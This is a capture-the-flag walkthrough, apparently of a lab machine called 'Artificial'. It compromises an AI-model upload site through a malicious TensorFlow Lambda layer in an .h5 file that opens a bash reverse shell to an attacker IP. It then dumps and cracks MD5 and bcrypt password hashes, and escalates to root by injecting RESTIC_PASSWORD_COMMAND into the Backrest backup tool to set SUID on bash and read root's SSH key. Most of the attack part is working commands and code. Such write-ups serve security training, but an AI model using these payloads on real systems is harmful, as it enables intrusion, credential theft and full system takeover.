RECON

Port Scan

$ rustscan -a $target_ip --ulimit 2000 -r 1-65535 -- -A -sC -Pn

PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 7c:e4:8d:84:c5:de:91:3a:5a:2b:9d:34:ed:d6:99:17 (RSA)
| ssh-rsa AAAAB3...
| 256 83:46:2d:cf:73:6d:28:6f:11:d5:1d:b4:88:20:d6:7c (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTI...
| 256 e3:18:2e:3b:40:61:b4:59:87:e8:4a:29:24:0f:6a:fc (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIH8QL1LMgQkZcpxuylBjhjosiCxcStKt8xOBU0TjCNmD
80/tcp open http syn-ack nginx 1.18.0 (Ubuntu)
|_http-title: Artificial - AI Solutions
| http-methods:
|_ Supported Methods: HEAD OPTIONS GET
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Note the website title: Artificial - AI Solutions.
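When the scan output gets long, it helps to pull out just the open services. The sketch below is a hypothetical helper (parse_open_ports is our name, not part of rustscan or nmap) and assumes the column order shown above, PORT STATE SERVICE REASON VERSION, with the REASON column present.

```python
import re

# Matches service lines in the column order of the scan above:
# PORT STATE SERVICE REASON VERSION (REASON assumed present, as in this output).
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"(?:\s+(?P<reason>\S+))?(?:\s+(?P<version>.+))?$"
)


def parse_open_ports(scan_output):
    """Return (port, service, version) tuples for every open port line."""
    results = []
    for raw in scan_output.splitlines():
        match = PORT_LINE.match(raw.strip())
        if match and match.group("state") == "open":
            version = (match.group("version") or "").strip()
            results.append((int(match.group("port")), match.group("service"), version))
    return results


SAMPLE = """\
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
80/tcp open http syn-ack nginx 1.18.0 (Ubuntu)
|_http-title: Artificial - AI Solutions
"""

# Script-output lines (starting with "|") and headers are skipped by the regex.
for port, service, version in parse_open_ports(SAMPLE):
    print(f"{port:>5}  {service:<6} {version}")
```

Lines that do not start with a port number, such as NSE script output, simply fail the match and are ignored.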

Port 80



Accessing the web interface, we register, authenticate, and quickly uncover a streamlined model upload endpoint:

As the page announces:

Upload, manage, and run your AI models here.

Please ensure these requirements are installed when building your model, or use our Dockerfile to build the needed environment with ease.

We're dealing with an AI/ML model upload platform that:

- Uses TensorFlow for model execution

- Invites users to upload AI models

- Provides a requirements.txt and Dockerfile to ensure compatibility

This implies we're expected to upload a TensorFlow model — which brings us to how we can weaponize that.

WEB

TensorFlow

TensorFlow is an open-source machine learning framework developed by Google. It is widely used for:

- Building and training neural networks

- Performing AI inference (e.g., image classification, natural language processing)

- Running models in production via Python, C++, or JavaScript backends

Key components:

| Component | Description |
|---|---|
| tensorflow.keras | High-level API for defining models (based on Keras) |
| model.save() | Exports the model (e.g., to .h5 or SavedModel/) |
| load_model() | Loads a model for inference; this is the vulnerable step in many systems |
| custom_objects | User-defined layers or functions that can be deserialized (RCE path) |

Our target platform lets us upload a TensorFlow model (e.g., .h5, .zip, or SavedModel/).

The server then calls:

tf.keras.models.load_model("upload_model.h5", compile=True)

TensorFlow deserializes the model, including any embedded Python code such as custom layers. If malicious code is embedded in those objects, it gets executed.

If the server runs our uploaded model without sanitizing it, we gain remote code execution (RCE).

TensorFlow RCE

Mechanism

Referencing this post, we weaponize TensorFlow's deserialization process to achieve Remote Code Execution by abusing the Lambda layer.

TL;DR:

TensorFlow's Lambda layer stores arbitrary Python functions when saving a model and blindly re-executes them during deserialization via load_model(), offering a clean RCE vector against systems that load untrusted .h5 files.

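TensorFlow's Lambda layer:

tf.keras.layers.Lambda(function)

This enables embedding any Python function into the model graph. While powerful, this layer is dangerously permissive: it serializes arbitrary code into the model file (in Keras 2.x, the function's marshalled bytecode, base64-encoded), and during model loading it triggers:

keras.utils.generic_utils.deserialize_keras_object()

which rebuilds the stored function without any inspection. The function then runs as soon as the layer is called while the model graph is reconstructed.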
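To see why no TensorFlow bug is needed, here is a stdlib-only model of the round trip. It roughly mirrors what we understand Keras 2.x's func_dump / func_load helpers to do (marshal the code object, base64 it, later rebuild a function from it); dump_function and load_function are hypothetical names, not Keras APIs, and the payload is a harmless stand-in for os.system().

```python
import base64
import builtins
import marshal
import types


def dump_function(func):
    # Roughly what Keras 2.x stores for a Lambda layer:
    # the marshalled code object, base64-encoded into the model config.
    return base64.b64encode(marshal.dumps(func.__code__)).decode("ascii")


def load_function(encoded):
    # Roughly what the loader does: decode, unmarshal, wrap in a new function.
    # Nothing here inspects what the bytecode will do once called.
    code = marshal.loads(base64.b64decode(encoded))
    globs = {"__builtins__": builtins}  # minimal globals, like a fresh loader context
    return types.FunctionType(code, globs, code.co_name)


def exploit(x):
    import os  # imported inside the body, so it does not rely on the loader's globals
    # Harmless stand-in for os.system(...): report which process ran us.
    return x, os.getpid()


blob = dump_function(exploit)   # what ends up inside the model file
rebuilt = load_function(blob)   # what the server reconstructs on load
value, pid = rebuilt(7)         # "calling the layer" runs attacker-controlled code
print(rebuilt.__name__, value)
```

Importing os inside the function body keeps the payload independent of whatever globals the loader supplies. Marshalled bytecode is also specific to the Python minor version, which is one reason interpreter parity with the target matters.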

In an attack chain, we simply bake our payload into a model:

import tensorflow as tf

def exploit(x):
    import os
    os.system("touch /tmp/pwned")  # RCE command
    return x

model = tf.keras.Sequential()
model.add(tf.keras.layers.Input(shape=(64,)))
model.add(tf.keras.layers.Lambda(exploit))
model.compile()
model.save("exploit.h5")

When a backend blindly runs:

tf.keras.models.load_model("exploit.h5")

it automatically deserializes and executes that Python function (exploit()).

This isn't a bug in TensorFlow itself. It's a classic deserialization attack born from misplaced trust: the server assumes the model file is benign.

As attackers, we can therefore embed os.system() or any other Python code, and it executes as soon as the model is loaded, giving us Remote Code Execution.

Exploit

Environment

The server offers two ways to ensure model compatibility with its execution environment.

Option 1 involves directly installing the expected version of TensorFlow via requirements.txt:

tensorflow-cpu==2.13.1

Option 2, and the one we lean into, is spinning up a containerized environment using the provided Dockerfile:

FROM python:3.8-slim
WORKDIR /code
RUN apt-get update && \
    apt-get install -y curl && \
    curl -k -LO https://files.pythonhosted.org/packages/65/ad/4e090ca3b4de53404df9d1247c8a371346737862cfe539e7516fd23149a4/tensorflow_cpu-2.13.1-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl && \
    rm -rf /var/lib/apt/lists/*
RUN pip install ./tensorflow_cpu-2.13.1-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl
ENTRYPOINT ["/bin/bash"]

This setup ensures:

- Clean isolation with Python 3.8

- Binary-level parity with TensorFlow 2.13.1 (CPU-only)

- No risk of tainting our host Python environment
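Once the container is up, parity with the target can be confirmed before building the model. One likely reason it matters: the Lambda payload travels as CPython bytecode, which is not guaranteed to be compatible across Python minor versions. This is a hypothetical check (check_parity is our name); the pinned versions come from the requirements.txt and Dockerfile above.

```python
import sys
from importlib import metadata

# Versions pinned by the target's requirements.txt / Dockerfile.
EXPECTED_PYTHON = (3, 8)
EXPECTED_TF_DIST = "tensorflow-cpu"
EXPECTED_TF_VERSION = "2.13.1"


def installed_version(dist_name):
    """Return the installed version of a distribution, or None if it is missing."""
    try:
        return metadata.version(dist_name)
    except metadata.PackageNotFoundError:
        return None


def check_parity(python_version, tf_version):
    """Compare a Python version tuple and a TF version string against the target's pins."""
    return {
        "python": tuple(python_version[:2]) == EXPECTED_PYTHON,
        "tensorflow": tf_version == EXPECTED_TF_VERSION,
    }


report = check_parity(sys.version_info, installed_version(EXPECTED_TF_DIST))
print(report)
```

Inside the tf_rce_env container both entries should be True; on a typical host at least one will not be.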

We pull in the exploit from this repo, which weaponizes the Lambda layer for model-based RCE:

git clone https://github.com/Splinter0/tensorflow-rce.git

mv Dockerfile tensorflow-rce/

cd tensorflow-rceBuild the Docker image:

export DOCKER_BUILDKIT=1

docker build -t tf_rce_env .Then launch an ephemeral container with volume mount:



docker run --rm -it -v $(pwd):/code tf_rce_envInside the container, we're now operating from /code, poised to generate a malicious .h5 model tailored for exploitation.

Build Model

In exploit.py, swap out the placeholder command with a reverse shell payload targeting our attack IP and listening port:



os.system("bash -c \"sh -i >& /dev/tcp/10.10.14.4/4444 0>&1\"")

Then execute the script:

python3 exploit.py

This bakes our payload into exploit.h5, a fully weaponized Keras model designed to detonate upon deserialization.
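Rather than hand-editing the escaped string in exploit.py, the payload line can be generated. This is a hypothetical helper (reverse_shell_command is our name) that reproduces the exact bash /dev/tcp one-liner used above and rejects malformed addresses or ports.

```python
import ipaddress


def reverse_shell_command(lhost, lport):
    """Build the bash /dev/tcp reverse-shell one-liner used in exploit.py."""
    ipaddress.ip_address(lhost)  # raises ValueError on a malformed IP
    port = int(lport)
    if not 0 < port < 65536:
        raise ValueError(f"port out of range: {port}")
    # bash -c is needed because ">&" redirection is bash syntax, not plain sh.
    return f'bash -c "sh -i >& /dev/tcp/{lhost}/{port} 0>&1"'


cmd = reverse_shell_command("10.10.14.4", 4444)
# repr() picks single quotes, so the line can be pasted into exploit.py unescaped.
print(f"os.system({cmd!r})")
```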

Trigger RCE



We upload exploit.h5 via the model interface:

Upon clicking "View Predictions", the backend blindly loads and executes our model using tf.keras.models.load_model(). The moment it deserializes the Lambda layer, our payload fires.



With a netcat listener primed:

We catch a reverse shell, landing directly as the app user.

USER

Post-exploitation begins with config footprinting: digging into the files that glue the web stack together. A quick sweep reveals a SQLite database under the Flask-style instance/ folder:

app@artificial:~/app$ ls instance
users.db
app@artificial:~/app$ file instance/users.db
instance/users.db: SQLite 3.x database, last written using SQLite version 3031001

Inspecting the .db file confirms it's a standard SQLite3 backend. Dumping the contents:

app@artificial:~/app$ sqlite3 instance/users.db

SQLite version 3.31.1 2020-01-27 19:55:54

Enter ".help" for usage hints.

sqlite> .tables

model user

sqlite> select * from user;

1|gael|[email protected]|c99175974b6e192936d97224638a34f8

2|mark|[email protected]|0f3d8c76530022670f1c6029eed09ccb

3|robert|[email protected]|b606c5f5136170f15444251665638b36

4|royer|[email protected]|bc25b1f80f544c0ab451c02a3dca9fc6

5|mary|[email protected]|bf041041e57f1aff3be7ea1abd6129d0

6|axura|[email protected]|dec3a1f5841f1029014aecf2cec0d0c8



sqlite> .exitYields a neat collection of users and hashed passwords. The user gael catches our attention, for we know he's our next target to compromise:

app@artificial:~/app$ ls /home
app gael

These hashes are unsalted MD5 (32 hex characters each), which is cryptographically obsolete and practically worthless for password storage. Crack gael's hash:


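The dump-and-crack steps can also be scripted with the standard library alone. A minimal sketch, assuming the column order shown in the sqlite3 dump (id | username | email | hash); dump_users, wordlist and crack_md5 are hypothetical helper names, and this is not necessarily the tool used in the screenshot.

```python
import hashlib
import sqlite3


def dump_users(conn):
    """Return (username, hash) pairs from the `user` table.

    Assumes the column order seen in the dump: id | username | email | hash.
    """
    return [(row[1], row[3]) for row in conn.execute("SELECT * FROM user")]


def wordlist(path):
    """Yield candidate passwords as raw bytes (rockyou.txt is not clean UTF-8)."""
    with open(path, "rb") as handle:
        for line in handle:
            yield line.rstrip(b"\r\n")


def crack_md5(target_hash, candidates):
    """Plain dictionary attack on an unsalted MD5 hex digest."""
    target = target_hash.lower()
    for word in candidates:
        if hashlib.md5(word).hexdigest() == target:
            return word.decode("utf-8", errors="replace")
    return None


# Usage on the box (paths from the walkthrough):
#   conn = sqlite3.connect("instance/users.db")
#   users = dict(dump_users(conn))
#   print(crack_md5(users["gael"], wordlist("/usr/share/wordlists/rockyou.txt")))
```

Because the hashes carry no salt, one pass over the wordlist per hash is all it takes; a real cracker like hashcat or John simply does the same thing much faster.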

Log in over SSH as gael / mattp005numbertwo to grab the user flag:

ROOT

Crack Hash

Post-user compromise, LinPEAS flags an interesting file in /var/backups: backrest_backup.tar.gz, owned by root:sysadm with 640 permissions.

app@artificial:/var/backups$ ll
total 51220
-rw-r--r-- 1 root root 38602 Jun 9 10:48 apt.extended_states.0
-rw-r--r-- 1 root root 4253 Jun 9 09:02 apt.extended_states.1.gz
-rw-r--r-- 1 root root 4206 Jun 2 07:42 apt.extended_states.2.gz
-rw-r--r-- 1 root root 4190 May 27 13:07 apt.extended_states.3.gz
-rw-r--r-- 1 root root 4383 Oct 27 2024 apt.extended_states.4.gz
-rw-r--r-- 1 root root 4379 Oct 19 2024 apt.extended_states.5.gz
-rw-r--r-- 1 root root 4367 Oct 14 2024 apt.extended_states.6.gz
-rw-r----- 1 root sysadm 52357120 Mar 4 22:19 backrest_backup.tar.gz

As gael is part of the sysadm group, we unpack it:

gael@artificial:/var/backups$ tar -xvf /var/backups/backrest_backup.tar.gz -C /tmp
backrest/
backrest/restic
backrest/oplog.sqlite-wal
backrest/oplog.sqlite-shm
backrest/.config/
backrest/.config/backrest/
backrest/.config/backrest/config.json
backrest/oplog.sqlite.lock
backrest/backrest
backrest/tasklogs/
backrest/tasklogs/logs.sqlite-shm
backrest/tasklogs/.inprogress/
backrest/tasklogs/logs.sqlite-wal
backrest/tasklogs/logs.sqlite
backrest/oplog.sqlite
backrest/jwt-secret
backrest/processlogs/
backrest/processlogs/backrest.log
backrest/install.sh

The contents resemble a backup manager's operational dump: config, binaries, logs, and secrets. A quick keyword sweep uncovers:

gael@artificial:/var/backups$ grep -riE "pass|secret|token|auth|user|admin|login|jwt|cookie" /tmp/backrest
Binary file /tmp/backrest/restic matches
/tmp/backrest/.config/backrest/config.json: "auth": {
/tmp/backrest/.config/backrest/config.json: "users": [
/tmp/backrest/.config/backrest/config.json: "passwordBcrypt": "JDJhJDEwJGNWR0l5OVZNWFFkMGdNNWdpbkNtamVpMmtaUi9BQ01Na1Nzc3BiUnV0WVA1OEVCWnovMFFP"
Binary file /tmp/backrest/backrest matches
/tmp/backrest/processlogs/backrest.log:{"level":"debug","ts":1741126673.1797245,"msg":"loading auth secret from file"}
/tmp/backrest/install.sh:User=$(whoami)
/tmp/backrest/install.sh:WantedBy=multi-user.target

The bcrypt hash we found is likely tied to a privileged account of the backup tool. However, it is base64-encoded rather than in the usual $2a$... format.
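The hash can also be pulled straight out of config.json instead of grepping for it. A minimal sketch (bcrypt_users and split_bcrypt are hypothetical helpers; CONFIG is a trimmed copy of the config.json from the backup) that decodes each passwordBcrypt value and splits the result into bcrypt's modular-crypt fields: version, cost, 22-character salt, and 31-character digest.

```python
import base64
import json

# Trimmed copy of backrest/.config/backrest/config.json from the backup.
CONFIG = """
{
  "modno": 2,
  "version": 4,
  "instance": "Artificial",
  "auth": {
    "disabled": false,
    "users": [
      {
        "name": "backrest_root",
        "passwordBcrypt": "JDJhJDEwJGNWR0l5OVZNWFFkMGdNNWdpbkNtamVpMmtaUi9BQ01Na1Nzc3BiUnV0WVA1OEVCWnovMFFP"
      }
    ]
  }
}
"""


def bcrypt_users(config_text):
    """Return (username, decoded bcrypt string) for each auth user."""
    config = json.loads(config_text)
    users = []
    for user in config.get("auth", {}).get("users", []):
        decoded = base64.b64decode(user["passwordBcrypt"]).decode("ascii")
        users.append((user["name"], decoded))
    return users


def split_bcrypt(hash_text):
    """Split "$2a$10$<22-char salt><31-char digest>" into its fields."""
    _, version, cost, rest = hash_text.split("$")
    return version, int(cost), rest[:22], rest[22:]


for name, hash_text in bcrypt_users(CONFIG):
    version, cost, salt, digest = split_bcrypt(hash_text)
    print(name, hash_text)
    print(f"  version={version} cost={cost} (2**{cost} rounds) salt={salt}")
```

The cost field (here 10, i.e. 2^10 key-expansion rounds) is what makes bcrypt far slower to attack than the unsalted MD5 hashes from users.db, so a small wordlist hit matters much more here.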

Base64-decoded:

gael@artificial:/var/backups$ echo 'JDJhJDEwJGNWR0l5OVZNWFFkMGdNNWdpbkNtamVpMmtaUi9BQ01Na1Nzc3BiUnV0WVA1OEVCWnovMFFP' | base64 -d
$2a$10$cVGIy9VMXQd0gM5ginCmjei2kZR/ACMMkSsspbRutYP58EBZz/0QO

Crack with Hashcat:

hashcat -m 3200 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt

Cracked:

$2a$10$cVGIy9VMXQd0gM5ginCmjei2kZR/ACMMkSsspbRutYP58EBZz/0QO:!@#$%^

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))

Combined with the config.json, this unlocks authenticated access to the Backrest system:

{

"modno": 2,

"version": 4,

"instance": "Artificial",

"auth": {

"disabled": false,

"users": [

{

"name": "backrest_root",

"passwordBcrypt": "JDJhJDEwJGNWR0l5OVZNWFFkMGdNNWdpbkNtamVpMmtaUi9BQ01Na1Nzc3BiUnV0WVA1OEVCWnovMFFP"

}

]

}



}Backrest

Backrest is an open-source project written in Go. It's described as:

Restic web-based frontend with scheduling, logging, and authentication.

Invoke the binary to inspect the help menu:

gael@artificial:/tmp/backrest$ ./backrest -h
Usage of ./backrest:
  -bind-address string
    address to bind to, defaults to 127.0.0.1:9898. Use :9898 to listen on all interfaces. Overrides BACKREST_PORT environment variable.
  -config-file string
    path to config file, defaults to XDG_CONFIG_HOME/backrest/config.json. Overrides BACKREST_CONFIG environment variable.
  -data-dir string
    path to data directory, defaults to XDG_DATA_HOME/.local/backrest. Overrides BACKREST_DATA environment variable.
  -install-deps-only
    install dependencies and exit
  -restic-cmd string
    path to restic binary, defaults to a backrest managed version of restic. Overrides BACKREST_RESTIC_COMMAND environment variable.

Among these options, we can already spot potential arbitrary-read and even arbitrary-command-execution primitives.

netstat also shows this service already listening on local port 9898, most likely running as root:

gael@artificial:/tmp/backrest$ netstat -lantp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:5000 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:9898 0.0.0.0:* LISTEN -
tcp 0 1 10.129.255.211:56926 8.8.8.8:53 SYN_SENT -
tcp 0 268 10.129.255.211:22 10.10.14.4:47822 ESTABLISHED -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -

Tunnel it to our attack machine:

ssh -L 9898:127.0.0.1:9898 [email protected]

Visit http://127.0.0.1:9898 and authenticate with backrest_root / !@#$%^ to gain full dashboard access:

Arbitrary Command Execution



The -restic-cmd help text shows that Backrest drives restic as an external process, and restic itself honors environment variables such as RESTIC_PASSWORD_COMMAND, which names a command restic runs to obtain the repository password. Since Backrest runs as root and passes a repository's configured environment variables to restic, we abuse this by injecting a key-value pair as an Env Var:

RESTIC_PASSWORD_COMMAND=/bin/chmod +s /bin/bash

Set it up when creating a new repo:


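Why does an environment variable turn into command execution? A rough model of how restic resolves its password, as we understand it: if a password command is configured, restic splits it into words, runs it directly (no shell), and uses its trimmed stdout as the password. The sketch below is hypothetical (resolve_password is our name, and shlex.split stands in for restic's own word splitting); the demo runs a harmless Python one-liner instead of chmod.

```python
import shlex
import subprocess
import sys


def resolve_password(env):
    """Hypothetical model of restic obtaining a repository password.

    If RESTIC_PASSWORD_COMMAND is set, the command is split into words and run
    directly; its trimmed stdout becomes the password. Otherwise fall back to
    RESTIC_PASSWORD.
    """
    command = env.get("RESTIC_PASSWORD_COMMAND")
    if command:
        # The command runs with the privileges of the calling process:
        # root, when restic is launched by a root-owned Backrest.
        result = subprocess.run(shlex.split(command), capture_output=True, text=True, check=False)
        return result.stdout.strip()
    return env.get("RESTIC_PASSWORD", "")


# Harmless demo: the "password command" just prints a string.
demo_env = {"RESTIC_PASSWORD_COMMAND": f"{shlex.quote(sys.executable)} -c \"print('from-command')\""}
print(resolve_password(demo_env))
```

With /bin/chmod +s /bin/bash as the command, stdout is empty, so restic presumably fails to open the repository afterwards; by then the chmod has already run as root.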

Back in our shell, /bin/bash now has the SUID bit set. Drop into a root shell (bash -p keeps the elevated effective UID instead of dropping it):

Root compromise achieved.
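The /bin/bash check above boils down to testing the set-user-ID bit in the file mode. A minimal sketch using only os and stat (has_suid and check_suid are hypothetical helper names):

```python
import os
import stat


def has_suid(mode):
    """True if the set-user-ID bit is present in a st_mode value."""
    return bool(mode & stat.S_ISUID)


def check_suid(path="/bin/bash"):
    """Return (suid?, ls-style permission string) for a path."""
    mode = os.stat(path).st_mode
    return has_suid(mode), stat.filemode(mode)


if os.path.exists("/bin/bash"):
    print(check_suid())
```

After the payload fires, the permission string for /bin/bash should show an "s" in the owner-execute position, the same thing ls -l displays.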

Arbitrary Read





Alternatively, because Backrest runs as root, it can back up arbitrary directories: we create a new repo, back up /root into it, and read the files back from the snapshot.

First, create a new repo with default flags, pointing its location to a directory we control:



Then navigate to the new repository via the web interface and issue backup commands from there:

The help menu reveals a wide array of available operations.



For example, we back up the root user's private SSH RSA key:

Grab the snapshot ID and dump the contents:



Another clean, effortless root:

We could also define a scheduled backup plan using advanced flags (as documented here), but that is unnecessary for our current compromise path.
